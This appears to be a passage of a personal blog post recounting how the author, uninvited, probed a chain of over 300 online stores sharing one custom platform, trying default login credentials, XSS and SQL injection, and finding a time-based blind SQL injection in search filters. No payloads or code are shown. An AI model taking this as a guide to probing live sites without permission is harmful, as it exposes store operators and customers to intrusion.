The story about how I compromised 300 stores, and a “Spanish consultancy”.
I was on an online store, you know, to compare prices about something I wanted to buy. I got bored. I opened the Wappalyzer: Apache 2.4.46, Amazon EC2, PHP. Okay!
It all started as a “let’s see if this site is vulnerable to something or not”. I’m not gonna post names, and I’ll try to avoid any hints. The report about the vulnerabilities and the misconfigurations is still ongoing, so some issues may not be fixed everywhere yet.
It was not a Wordpress or another kind of CMS, okay… I checked the robots.txt. I found a panel to log in… I tried default credentials like admin/admin, etc., but were not working. Reading the footer of the log-in panel, I found two things. The store is part of a chain with more than 300 stores, and the CMS/Platform (I don’t know how to call it) was made by the same company. A little bit of “Googling” to confirm, and I found that ALL OF THEM have the same “CMS”, the same log-in panel, just a few differences like CSS, languages, etc. What if all of them have common credentials? Looks promising! 😅
I’m always trying the basic things first. I tried some reflected/persistent XSS, SQL Injection on the search bar, etc,. there are some params in the URL, so I thought that I could inject code there, but I wasn’t successful in the beginning. At that moment I thought: “Well… maybe the people that built this custom CMS are sanitizing the params, or using I don’t know, some framework that is doing that for them under the hood”. Not really. Have you ever read before about Time-Based Blind SQL Injection Attacks? The search bar has some filters to apply, so I tried some things on them, and BINGO! 😎
/cdn.vox-cdn.com/uploads/chorus_asset/file/25413747/GL2ubyMWwAAXF7n.jpeg)
